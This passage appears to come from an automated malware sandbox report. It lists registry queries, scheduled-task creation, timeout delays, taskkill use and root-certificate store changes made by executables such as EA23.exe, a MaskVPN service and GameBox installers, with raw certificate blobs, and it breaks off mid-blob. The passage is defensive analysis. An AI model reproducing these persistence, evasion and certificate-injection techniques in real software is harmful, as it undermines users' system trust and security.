| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04